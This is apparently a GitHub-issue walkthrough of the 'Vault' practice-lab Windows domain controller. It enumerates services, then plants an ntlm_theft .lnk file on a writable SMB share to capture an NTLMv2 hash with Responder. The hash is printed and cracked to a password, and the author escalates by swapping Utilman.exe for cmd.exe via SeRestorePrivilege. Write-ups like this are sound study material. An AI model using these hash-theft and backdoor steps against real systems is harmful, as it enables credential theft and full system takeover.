search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Vault (Hard, Windows AD, 2021) -- ntlm_theft, SeRestorePrivilege #58

Open WDavid404 opened 2 months ago

WDavid404 commented 2 months ago

Keypoints:

WDavid404 commented 2 months ago 
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-10 14:41:57Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec

5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49804/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

53/tcp

--> no info

rpd

rpcclient -U '' -N 192.168.208.172 --> no info

130/tcp, 445/tcp (SMB)

crackmapexec smb 192.168.208.172 --shares --> no info

smbmap -u null -p "" -H 192.168.208.172 -P 445 -r 2>&1 --> image

smbclient //192.168.208.172/DocumentsShare --》 no file exist but we can upload files.

389/tcp (LDAP)

ldapsearch -H ldap://192.168.208.172 -x -s base namingcontexts --> 

namingcontexts: DC=vault,DC=offsec
namingcontexts: CN=Configuration,DC=vault,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=vault,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=vault,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=vault,DC=offsec

ldapsearch -H ldap://192.168.208.172 -x -b"DC=vault,DC=offsec" --> no info

GetNPUsers.py vault.offsec/ -dc-ip 192.168.208.172 --> no info

Create a lnk file and upload to SMB

ntlm_theft A tool for generating multiple types of NTLMv2 hash theft files. python3 ntlm_theft.py -g lnk -s 192.168.45.205 -f test -->

Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.

sudo responder -I tun0

Put test.link to SMB image

then, we got NTML hash info image anirudh::VAULT:f2ec956185976991:33271D831D2A00FEC4E4011576C143C7:010100000000000080115D2A7EEBDA01F6AE5B5DB64B0BB50000000002000800430046004200520001001E00570049004E002D0056004D0059004E003000320056004B0055004C00480004003400570049004E002D0056004D0059004E003000320056004B0055004C0048002E0043004600420052002E004C004F00430041004C000300140043004600420052002E004C004F00430041004C000500140043004600420052002E004C004F00430041004C000700080080115D2A7EEBDA01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100390031000000000000000000

crack the hash with john tool image image --> anirudh: SecureHM

evil-winrm -i 192.168.208.172 -u anirudh -p SecureHM image

WDavid404 commented 2 months ago

PE

whoami /priv image We can see "SeRestorePrivilige" is enabled. =====> We can use the same way as "Heist box" (https://github.com/WDavid404/PG-Box/issues/57#issuecomment-2277967937)

get-childitem -path C:\Windows\System32\ -include utilman.exe -file -recurse -erroraction silentlycontinue --> utilman.exe is located in "C:\Windows\System32" cd C:\Windows\System32 mv Utilman.exe Utilman-bk.exe mv cmd.exe Utilman.exe image

[Kali] rdesktop $IP image